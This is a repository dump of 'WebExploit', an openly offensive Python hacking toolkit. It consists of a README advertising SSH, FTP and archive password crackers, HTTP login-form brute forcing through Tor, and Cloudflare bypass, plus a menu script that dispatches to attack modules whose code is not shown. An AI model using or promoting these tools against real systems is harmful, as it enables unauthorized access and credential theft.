├── README.md
├── VERSION
├── WebExploit.py
├── cores
├── __pycache__
│ ├── ahf.cpython-310.pyc
│ ├── aps.cpython-310.pyc
│ ├── b64.cpython-310.pyc
│ ├── baner.cpython-310.pyc
│ ├── cfb.cpython-310.pyc
│ ├── cms.cpython-310.pyc
│ ├── dirboster.cpython-310.pyc
│ ├── fpc.cpython-310.pyc
│ ├── ipl.cpython-310.pyc
│ ├── mojiana.cpython-310.pyc
│ ├── ping.cpython-310.pyc
│ ├── rarc.cpython-310.pyc
│ ├── ril.cpython-310.pyc
│ ├── ssc.cpython-310.pyc
│ ├── sse.cpython-310.pyc
│ ├── wpf.cpython-310.pyc
│ └── zipc.cpython-310.pyc
├── ahf.py
├── aps.py
├── b64.py
├── baner.py
├── cfb.py
├── cms.py
├── default-dirs.txt
├── dirboster.py
├── fpc.py
├── history
├── ipl.py
├── mojiana.py
├── ping.py
├── pnt.py
├── rarc.py
├── ril.py
├── ssc.py
├── sse.py
├── subdomains.txt
├── updater.py
├── wp-plugins.txt
├── wpf.py
└── zipc.py
├── examples
├── data_httpGet_example.txt
├── header.json
├── hosts_ForAngryIpScanner.txt
├── ipRange_Example.txt
├── passlist_example.txt
└── users.txt
├── files
├── .version
└── updateControl.py
├── img
├── APS.jpg
├── Infog_menu.png
├── PasswordCrack.png
├── WebExploit.jpg
├── WebExploitMenu.png
├── eyecrackerMojiana.jpg
├── history
└── privateWebHacking.png
├── installer.sh
├── licence
└── LICENSE
├── requirements.txt
└── setup.py
/README.md:
--------------------------------------------------------------------------------
1 | [](https://github.com/c4ssif3r/WebExploit)
2 | 
3 | 
4 | [](http://127.0.0.1:9050)
5 | 
6 | 
7 |
8 | - [X] __WebExploit:__
9 | - Vesrion 1.0.0 [MJI]
10 | 
11 |
12 | ##### Launch and installing WebExploit 🕸️:
13 |
14 | 1. Clone WebExploit from github:
15 |
16 | - `git clone https://github.com/C4ssif3r/WebExploit/`
17 |
18 | 2. Change directory to WebExploit
19 |
20 | - `cd WebExploit`
21 |
22 | 3. Installin requirements python library:
23 |
24 | + For LINUX:
25 | - `sudo python setup.py install`
26 |
27 | + For TERMUX:
28 | - python setup.py install`
29 |
30 | 4. Launch (run) Web Exploit with python3.x:
31 |
32 | - `python WebExploit.py`
33 |
34 | ### other requirements (for noobs!)
35 |
36 | `apt update -y && apt upgrade -y && apt install python -y && apt install git -y`
37 |
38 | + Install Python Pip (if is not installed!)
39 |
40 | `apt install python-pip`
41 |
42 | 
43 |
44 | ###### TESTED ON:
45 | + [X] TERMUX
46 | + [X] KALI LINUX
47 |
48 | **Note ! If u using kali to sure using** `sudo` **when installing requirements!!!**
49 |
50 | 
51 | #### preview WebExploit
52 | + ###### WebExploit Main Menu:
53 | []()
54 | ### Features:
55 | + #### Information Gathering:
56 | [ℹ️ Whats Information Gathering?](https://github.com/C4ssif3r/WebExploit/wiki/Information-Gathering)
57 | []()
58 | + Advanced Port Scanner. [Click for show info & How To Use](https://github.com/C4ssif3r/WebExploit/wiki/Advanced-Port-Scanner-Tool)
59 | + Angry Hash Type Finder [Identifier All Hash Types] [Click For Show Info & How To Use?](https://github.com/C4ssif3r/WebExploit/wiki/Angry-Hash-Finder-(type(identifier))-%F0%9F%98%A1)
60 | + Base 16 32 64 85 Decode & Encode [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Base-16-32-64-85-Decodr-&-Encoder)
61 | + BruteForce Directories [DirBooster] [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/DirBooster-%F0%9F%91%BD)
62 | + CloudFlare Bypasser [Get Real IPv4] [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/cloudflare-bypasser)
63 | + CMS - Content Management System [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Cms-detector)
64 | + Get Location By ip:v4 (Show On GoggleMap) [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Ipl-Ip-to-location!)
65 | + Ping Tool < By External Server > [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Ping-tool-by-external-server)
66 | + Reverse Ip Lookup ( Get Sites On A IP ) [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Reverse-ip-lookup-!-Domain-LookUp-:-%3F)
67 | + Shodan Search Engine \+ Save Results [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Sse-shodan-Search-Engine-%F0%9F%94%8D-XD%F0%9F%94%8E)
68 |
69 | + #### Private Web Hacking:
70 | [ℹ️ Whats Priv8 Hacking Tools?](https://github.com/C4ssif3r/WebExploit/wiki/Priv8-Web-Hacking)
71 | []()
72 | + BruteForce Directories [DirBooster] [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Base-16-32-64-85-Decodr-&-Encoder)
73 | + CloudFlare Bypasser [Get Real IPv4] [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/cloudflare-bypasser)
74 | + (EyeCracker)Mojiana ( BruteForce All HTTP Forms ) [angry 😡💢 ! Click For show options and how to use it!?](https://github.com/C4ssif3r/WebExploit/wiki/Mojiana-!)
75 |
76 | | Supoort | MethodRequest | ProxySupportTypes |
77 | | :-------------------- | :--------------------: | --------------------: |
78 | | YES | HTTP(S) POST FORM | TOR, HTTP(S), SOCKS4,5 |
79 | | YES | HTTP(S) GET FORM | TOR, HTTP(S), SOCKS4,5 |
80 | - [X] PROXY SUPPORT
81 | - HTTP(S)
82 | - SOCKS4,5
83 | - TOR 
84 | - [X] HEADER SUPPORT
85 | - [X] COOKIE SUPPORT
86 | 
87 |
88 | + Reverse Ip Lookup ( Get Sites On A IP )
89 |
90 | + #### Password Attacks (Crack)
91 | [ℹ️ Whats Password Attacks Tools?](https://github.com/C4ssif3r/WebExploit/wiki/Password-Attacks-Crack!)
92 | []()
93 | + Angry Hash Type Finder [Identifier All Hash Types] [Click For Show Info & How To Use?](https://github.com/C4ssif3r/WebExploit/wiki/Angry-Hash-Finder-(type(identifier))-%F0%9F%98%A1)
94 | + Base 16 32 64 85 Decode & Encode [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Base-16-32-64-85-Decodr-&-Encoder)
95 | + FTP Crakcer [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Ftp-cracker)
96 | + SSH Cracker [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Ssh-cracker)
97 | + RAR Password Cracker [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Rar-cracker)
98 | + ZIP Password Cracker [Click For Show Info and How to use?](https://github.com/C4ssif3r/WebExploit/wiki/Zip-Cracker)
99 | + (EyeCracker)Mojiana ( BruteForce All HTTP(s) Forms ) [angry 😡💢 ! Click For show options and how to use it!?](https://github.com/C4ssif3r/WebExploit/wiki/Mojiana-!)
100 |
101 | | Supoort | MethodRequest | ProxySupportTypes |
102 | | :-------------------- | :--------------------: | --------------------: |
103 | | YES | HTTP(S) POST FORM | TOR, HTTP(S), SOCKS4,5 |
104 | | YES | HTTP(S) GET FORM | TOR, HTTP(S), SOCKS4,5 |
105 | - [X] PROXY SUPPORT
106 | - HTTP(S)
107 | - SOCKS4,5
108 | - TOR 
109 | - [X] HEADER SUPPORT
110 | - [X] COOKIE SUPPORT
111 |
112 | 
113 |
114 | > EyeCracker Pic:
115 |
116 | [](t.me/Zer0x00)
117 |
118 |
119 | 
120 |
121 |
122 |
123 | `.◠.`
124 |
125 | `Please Report Bug's to my telegram:)`
126 |
127 | 
128 | Report bug 🪲 [](https://t.me/IranPwner)
129 |
130 | 
131 |
--------------------------------------------------------------------------------
/VERSION:
--------------------------------------------------------------------------------
1 | 2.0.0
2 |
--------------------------------------------------------------------------------
/WebExploit.py:
--------------------------------------------------------------------------------
1 | def WebExploit():
2 | '''
3 | 'MjI'
4 | _____________
5 | MIT License
6 |
7 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
8 |
9 | Permission is hereby granted, free of charge, to any person obtaining a copy
10 | of this software and associated documentation files (the "Software"), to deal
11 | in the Software without restriction, including without limitation the rights
12 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
13 | copies of the Software, and to permit persons to whom the Software is
14 | furnished to do so, subject to the following conditions:
15 |
16 | The above copyright notice and this permission notice shall be included in all
17 | copies or substantial portions of the Software.
18 |
19 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
20 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
21 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
22 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
23 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
24 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
25 | SOFTWARE.
26 | '''
27 |
28 |
29 | import os,sys
30 | from colorama import Fore as f
31 | import time as t
32 | from treelib import Node, Tree
33 | tree = Tree()
34 | class FlowerNode(Node):
35 | def __init__(self, color):
36 | self.color = color
37 | fnode = FlowerNode("white")
38 |
39 | # baner #bnr
40 | # dirboster #dirboster
41 | # zipc # zip password cracker
42 | # rarc # rar password cracker
43 | # aps #advanced port scanner
44 | # wpf # wordpress plugin finder
45 | # ipl # ip location tool
46 | # ril # reverce ip lookup
47 | # ssc # ssh cracker
48 | # fpc # ftp cracker
49 | # b64 # base 16, 32, 64, 85 tools . enc . dec
50 | # sse # shodan search engine
51 | # cms # content management system detector
52 | # cfb # CloadFlare bypasser
53 | # mojiana # ?
54 | # ping # ping tool
55 | # ahf # angry hash finder
56 | # updater # update WebExploit
57 | from cores import (updater, baner, dirboster, zipc, rarc, aps, wpf, ipl, ril, ssc, fpc, b64, sse, cms, cfb, mojiana, ping, ahf, pnt)
58 | reset = "\033[0m"
59 | red = "\033[0;31m"
60 | class C:
61 | '''
62 | Define Colors By Manual.
63 | '''
64 | black = "\033[0;30m"
65 | red = "\033[0;31m"
66 | green = "\033[0;32m"
67 | brown = "\033[0;33m"
68 | blue = "\033[0;34m"
69 | purple = "\033[0;35m"
70 | cyan = "\033[0;36m"
71 | l_gray = "\033[0;37m"
72 | dark_gray = "\033[1;30m"
73 | l_red = "\033[1;31m"
74 | red = "\033[1;31m"
75 | l_green = "\033[1;32m"
76 | green = "\033[1;32m"
77 | yellow = "\033[1;33m"
78 | l_blue = "\033[1;34m"
79 | l_purple = "\033[1;35m"
80 | l_cyan = "\033[1;36m"
81 | l_white = "\033[1;37m"
82 | faint = "\033[2m"
83 | italic = "\033[3m"
84 | underline = "\033[4m"
85 | blink = "\033[5m"
86 | nefative = "\033[7m"
87 | cross = "\033[9m"
88 | ended = "\033[0m"
89 | bold = "\033[1m"
90 | nbold = "\033[0m"
91 | reset = "\033[0m"
92 | white = f.WHITE
93 | global c
94 | c = C
95 | updater.run()
96 |
97 | while True:
98 | bnr = baner.baner()
99 | print (bnr+f.WHITE+".VERSION 2.0.0 \MJ\\"+C.reset+C.bold)
100 | print ('|')
101 | #print(f.WHITE+""+C.reset+C.bold)
102 | class F(object):
103 | def __init__(self, color):
104 | self.color = color
105 |
106 | ftree = Tree()
107 | tree = Tree()
108 | tree1 = Tree()
109 | tree2 = Tree()
110 | tree3 = Tree()
111 | tree.create_node("Web Exploit", "WebExploit") # root
112 | tree.create_node("1- Information Gathering", "info", parent="WebExploit")
113 | #tree.create_node("", "", parent="crack")
114 | # tree.create_node("2- Web Hacking", "WebHacking", parent="WebExploit")
115 | # tree.create_node("Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]]", "mojiana2", parent="WebHacking")
116 | # tree.create_node("Content Management", "cms12", parent="WebHacking")
117 | tree.create_node("2- Private Web Hacking", "p8web", parent="WebExploit")
118 | tree.create_node("Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]]", "mojiana3", parent="p8web")
119 | tree.create_node("Brute Force Directories - [Dir Booster]", "dirboster", parent="p8web")
120 | tree.create_node("Cloud Flare Bypass - [Get Real Ip]", "cfb2", parent="p8web")
121 | tree.create_node("3- Password Attacks", "crack", parent="WebExploit")
122 | tree.create_node("Base 16,32,64,85 Encode | Decode", "ba64", parent="crack")
123 | tree.create_node("Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]]", "mojiana", parent="crack")
124 | tree.create_node("SSH cracker Tool", "sshc", parent="crack")
125 | tree.create_node("FTP cracker Tool", "ftpc", parent="crack")
126 | tree.create_node("ZIP password cracker Tool", "zipC", parent="crack")
127 | tree.create_node("RAR password cracker Tool", "rarC", parent="crack")
128 | tree.create_node("Angry Hash Type Finder - [Identifier]", "aAHF", parent="crack")
129 | tree.create_node("Reverse Ip Lookup - [Get Sites On a IP]", "ril2", parent="p8web")
130 | tree.create_node("Cloud Flare Bypass - [Get Real Ip]", "cfb", parent="info")
131 | tree.create_node("WordPress Plugin Finder", "wpf", parent="info")
132 | tree.create_node("Get Location By Ip v4", "ipl", parent="info")
133 | tree.create_node("Brute Force Directories - [Dir Booster]", "dirbooster", parent="info")
134 | tree.create_node("Advanced Port Scanner", "aps", parent="info")
135 | tree.create_node("Reverse Doamin Lookup - [Get Sites on a IP]", "ril", parent="info")
136 | tree.create_node("Base 16,32,64,85 Tool Enc-Dec", "b64", parent="info")
137 | tree.create_node("Shodan Search Engine + [Save Results]", "sse", parent="info")
138 | tree.create_node("Content Management System Detector", "cms", parent="info")
139 | tree.create_node("Angry Hash Type Finder - [Identifier]", "ahf", parent="info")
140 | tree.create_node("Ping Tool - [By External Server]", "ping", parent="info")
141 | #tree.create_node("Version 1.0.0 \mj\\", "version", parent="WebExploit")
142 | #tree.create_node("", "", parent="info")
143 | # TREE 1
144 | # print ('\n')
145 | tree1.create_node("Information Gathering", "infog") # root info g
146 | tree1.create_node("10 -> WordPress Plugin Finder Tool ", "wpf2", parent='infog')
147 | tree1.create_node("0 -> Advanced Port Scanner", "aps2", parent='infog')
148 | tree1.create_node("1 -> Angry Hash Type Finder - [Identifier]", "ang2", parent='infog')
149 | tree1.create_node("2 -> Base 16,32,64,85 Tool Enc-Dec", "bse2", parent='infog')
150 | tree1.create_node("3 -> Brute Force Directories - [Dir Booster]", "db2", parent='infog')
151 | tree1.create_node("4 -> Cloud Flare Bypass - [Get Real Ip]", "clb2", parent='infog')
152 | tree1.create_node("5 -> Content Management System Detector", "cms2", parent='infog')
153 | tree1.create_node("6 -> Get Location By Ip v4 [show on google map]", "ipl2", parent='infog')
154 | tree1.create_node("7 -> Ping Tool - [By External Server]", "ping2", parent='infog')
155 | tree1.create_node("8 -> Reverse Domain Lookup - [Get Sites on a IP]", "rdl2", parent='infog')
156 | tree1.create_node("9 -> Shodan Search Engine + [Save Results]", "sse2", parent='infog')
157 | tree1.create_node("10 -> PhoneNumber To location + [PhoneLocFinder]", "pnt", parent='infog')
158 | # m
159 |
160 | # web attacks
161 | #ftree.show()
162 | # TREE 2
163 | tree2.create_node("Private Web Hacking", "p8_2") # root
164 | tree2.create_node("0 -> Brute Force Directories - [Dir Booster]", "bfd2", parent='p8_2')
165 | tree2.create_node("1 -> Cloud Flare Bypass - [Get Real Ip]", "cfb2", parent='p8_2')
166 | tree2.create_node("2 -> Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]] 4y", "mjiari2", parent='p8_2')
167 | tree2.create_node("3 -> Reverse Ip Lookup - [Get Sites On a IPv4]", "ril3", parent='p8_2')
168 | # TREE 3
169 | tree3.create_node("Crack And Password Attacks", "cpa") # root
170 | tree3.create_node("0 -> Angry Hash Type Finder - [Identifier]", "ag2", parent='cpa')
171 | tree3.create_node("1 -> Base 16,32,64,85 Encode | Decode", "b_all", parent='cpa')
172 | tree3.create_node("2 -> FTP cracker Tool", "ftp2", parent='cpa')
173 | tree3.create_node("3 -> Mojiana [EYE Cracker Tool] Crack All HTTP[S][post-[form]][get-[form]]", "mjiari3", parent='cpa')
174 | tree3.create_node("4 -> RAR password cracker Tool", "rar2", parent='cpa')
175 | tree3.create_node("5 -> SSH cracker Tool", "ssh2", parent='cpa')
176 | tree3.create_node("6 -> ZIP password cracker Tool", "zip2", parent='cpa')
177 |
178 | print('.MJi')
179 | print('|')
180 | tree.show()
181 | # try:
182 |
183 | while True:
184 | try:
185 | method:str = input(f'.{C.italic}/Mji/WebExploit:~# {C.bold}{C.green}')
186 | break
187 |
188 | except:
189 | print ('please enter a valid value !')
190 | continue
191 | if method == 1 or '1' in method:
192 |
193 | try:
194 | while True:
195 | os.system('clear')
196 | print (bnr)
197 | print(f.WHITE+""+reset)
198 | tree1.show()
199 | mj = input(f'.{C.italic}/Mji/WebExploit/Information-Gathering{C.reset}:~# {C.bold}{C.green}')
200 | if mj:
201 | if mj == '0':
202 | print (f'{c.reset}')
203 | aps.run()
204 | input('press enter for back to menu and press CTRL+C for exit')
205 |
206 | if mj == '1':
207 | print (f'{c.reset}')
208 | ahf.run()
209 | input('press enter for back to menu and press CTRL+C for exit')
210 |
211 | if mj == '2':
212 | print (f'{c.reset}')
213 | b64.run()
214 | input('press enter for back to menu and press CTRL+C for exit')
215 |
216 | if mj == '3':
217 | print (f'{c.reset}')
218 |
219 | dirboster.run()
220 | input('press enter for back to menu and press CTRL+C for exit')
221 |
222 | if mj == '4':
223 | print (f'{c.reset}')
224 | cfb.run()
225 | input('press enter for back to menu and press CTRL+C for exit')
226 |
227 | if mj == '5':
228 | print (f'{c.reset}')
229 | cms.run()
230 | input('press enter for back to menu and press CTRL+C for exit')
231 |
232 | if mj == '6':
233 | print (f'{c.reset}')
234 | ipl.run()
235 | input('press enter for back to menu and press CTRL+C for exit')
236 |
237 | if mj == '7':
238 | print (f'{c.reset}')
239 | ping.run()
240 | input('press enter for back to menu and press CTRL+C for exit')
241 |
242 | if mj == '8':
243 | print (f'{c.reset}')
244 | ril.run()
245 | input('press enter for back to menu and press CTRL+C for exit')
246 |
247 | if mj == '9':
248 | print(f'{c.reset}')
249 | sse.run()
250 | input('press enter for back to menu and press CTRL+C for exit')
251 |
252 | if mj == '10':
253 | print(f'{c.reset}')
254 | wpf.run()
255 | input ("press enter for back to menu and press CTRL+C for exit")
256 | if mj == '11':
257 | print(f'{c.reset}')
258 | pnt.run()
259 | input ("press enter for back to menu and press CTRL+C for exit")
260 | else:
261 | input(f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !')
262 | continue
263 | else:
264 | # input("press enter for back to menu")
265 | print (f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !')
266 | cmd=input(f'{C.red}{C.bold}WebExploit{C.reset} - exit ? y/n -> {C.green}').lower()
267 | if 'y' in cmd:
268 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!')
269 | break
270 | sys.exit(0)
271 | # else:
272 | # input(f'{C.red}{C.bold}WebExploit{C.white} -> Invalid Command Try Again [{C.bold}press enter{C.white}]')
273 | # continue
274 | except Exception as derr:
275 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye! {derr}')
276 | sys.exit(0)
277 |
278 |
279 | if method == 2 or '2' in method:
280 | try:
281 | while True:
282 | os.system('clear')
283 | print (bnr)
284 | print(f.WHITE+""+reset)
285 | tree2.show()
286 | mj = input(f'.{C.italic}/Mji/WebExploit/Private Web Hacking{C.reset}:~# {C.bold}{C.green}')
287 | if mj:
288 | if mj == '0':
289 | print (f'{c.reset}')
290 | dirboster.run()
291 | input('press enter for back to menu and press CTRL+C for exit')
292 |
293 | elif mj == '1':
294 | print (f'{c.reset}')
295 | cfb.run()
296 | input('press enter for back to menu and press CTRL+C for exit')
297 |
298 | elif mj == '2':
299 | print (f'{c.reset}')
300 | mojiana.run()
301 | input('press enter for back to menu and press CTRL+C for exit')
302 |
303 | elif mj == '3':
304 | print (f'{c.reset}')
305 | ril.run()
306 | # input('press enter for back to menu and press CTRL+C for exit')
307 | else:
308 | input(f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !')
309 | continue
310 | else:
311 | print (f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !')
312 | cmd=input(f'{C.red}{C.bold}WebExploit{C.reset} - exit ? y/n -> {C.green}').lower()
313 | if 'y' in cmd:
314 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!')
315 | sys.exit(0)
316 | # input(f'{C.red}{C.bold}WebExploit{C.white} -> Invalid Command Try Again [{C.bold}press enter{C.white}]')
317 | # continue
318 | except:
319 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!')
320 | sys.exit(0)
321 | # TREE 3
322 | if method == 3 or '3' in method:
323 |
324 | try:
325 | while True:
326 | os.system('clear')
327 | print (bnr)
328 | print(f.WHITE+""+reset)
329 | tree3.show()
330 | mj = input(f'.{C.italic}/Mji/WebExploit/PasswordAttack-Crack{C.reset}:~# {C.bold}{C.green}')
331 | if mj:
332 | if mj == '0':
333 | print (f'{c.reset}')
334 | ahf.run()
335 | input('press enter for back to menu and press CTRL+C for exit')
336 |
337 | if mj == '1':
338 | print (f'{c.reset}')
339 | b64.run()
340 | input('press enter for back to menu and press CTRL+C for exit')
341 |
342 | if mj == '2':
343 | print (f'{c.reset}')
344 | fpc.run()
345 | input('press enter for back to menu and press CTRL+C for exit')
346 |
347 | if mj == '3':
348 | print (f'{c.reset}')
349 | mojiana.run()
350 | input('press enter for back to menu and press CTRL+C for exit')
351 |
352 | if mj == '4':
353 | print (f'{c.reset}')
354 | rarc.run()
355 | input('press enter for back to menu and press CTRL+C for exit')
356 |
357 | if mj == '5':
358 | print (f'{c.reset}')
359 | ssc.run()
360 | input('press enter for back to menu and press CTRL+C for exit')
361 |
362 | if mj == '6':
363 | print (f'{c.reset}')
364 | zipc.run()
365 | input('press enter for back to menu and press CTRL+C for exit')
366 |
367 |
368 | else:
369 | input(f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !')
370 | continue
371 | else:
372 | input("press enter for back to menu")
373 | print (f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !')
374 | cmd=input(f'{C.red}{C.bold}WebExploit{C.reset} - exit ? y/n -> {C.green}').lower()
375 | if 'y' in cmd:
376 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!')
377 | sys.exit(0)
378 | # input(f'{C.red}{C.bold}WebExploit{C.white} -> Invalid Command Try Again [{C.bold}press enter{C.white}]')
379 | # continue
380 | except:
381 | print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!')
382 | sys.exit(0)
383 | # if method == 4 or '4' in method:
384 | #
385 | # try:
386 | # while True:
387 | # os.system('clear')
388 | # print (bnr)
389 | # print(f.WHITE+""+reset)
390 | #
391 | # tree1.show()
392 | # mj = input(f'.{C.italic}/Mji/WebExploit/Information-Gathering{C.reset}:~# {C.bold}{C.green}')
393 | # if mj:
394 | # if mj == '0':
395 | # print (f'{c.reset}')
396 | # aps.run()
397 | # input('press enter for back to menu and press CTRL+C for exit')
398 | #
399 | # if mj == '1':
400 | # print (f'{c.reset}')
401 | # ahf.run()
402 | # input('press enter for back to menu and press CTRL+C for exit')
403 | # break
404 | # if mj == '2':
405 | # print (f'{c.reset}')
406 | # b64.run()
407 | # input('press enter for back to menu and press CTRL+C for exit')
408 | # break
409 | # if mj == '3':
410 | # print (f'{c.reset}')
411 | # dirboster.run()
412 | # input('press enter for back to menu and press CTRL+C for exit')
413 | # break
414 | # if mj == '4':
415 | # print (f'{c.reset}')
416 | # cfb.run()
417 | # input('press enter for back to menu and press CTRL+C for exit')
418 | # break
419 | # if mj == '5':
420 | # print (f'{c.reset}')
421 | # cms.run()
422 | # input('press enter for back to menu and press CTRL+C for exit')
423 | # break
424 | # if mj == '6':
425 | # print (f'{c.reset}')
426 | # ipl.run()
427 | # input('press enter for back to menu and press CTRL+C for exit')
428 | # break
429 | # if mj == '7':
430 | # print (f'{c.reset}')
431 | # ping.run()
432 | # input('press enter for back to menu and press CTRL+C for exit')
433 | # break
434 | # if mj == '8':
435 | # print (f'{c.reset}')
436 | # ril.run()
437 | # input('press enter for back to menu and press CTRL+C for exit')
438 | # break
439 | # if mj == '9':
440 | # print (f'{c.reset}')
441 | # sse.run()
442 | # input('press enter for back to menu and press CTRL+C for exit')
443 | # break
444 | #
445 | # else:
446 | # input(f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !')
447 | # continue
448 | # else:
449 |
450 | # # print (f'{C.red}ERROR!{c.white}\n\t Enter A Number of tools!\n{C.yellow}For exit press {C.white}[ {C.bold}CTRL+C{C.reset} ] !')
451 | # # cmd=input(f'{C.red}{C.bold}WebExploit{C.reset} - exit ? y/n -> {C.green}').lower()
452 | # # if 'y' in cmd:
453 | # # print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!')
454 | # # sys.exit(0)
455 | # # input(f'{C.red}{C.bold}WebExploit{C.white} -> Invalid Command Try Again [{C.bold}press enter{C.white}]')
456 | # # continue
457 | # except:
458 | # print (f'{C.white}{C.red}{C.bold}WebExploit{C.white}{C.reset} \n\t\t Bye!')
459 | # sys.exit(0)
460 | else:
461 | # input('\nerror\nBYE!\n')
462 | # os.system('clear')
463 | # break
464 | pass
465 | # except KeyboardInterrupt:
466 | # input(f'\nWebExploit -> Invalid Command \nBYE! ')
467 | # break
468 |
469 | WebExploit()
470 |
471 |
--------------------------------------------------------------------------------
/cores/__pycache__/ahf.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ahf.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/aps.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/aps.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/b64.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/b64.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/baner.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/baner.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/cfb.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/cfb.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/cms.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/cms.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/dirboster.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/dirboster.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/fpc.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/fpc.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/ipl.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ipl.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/mojiana.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/mojiana.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/ping.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/ping.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/rarc.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/cores/__pycache__/rarc.cpython-310.pyc
--------------------------------------------------------------------------------
/cores/__pycache__/ril.cpython-310.pyc:
--------------------------------------------------------------------------------
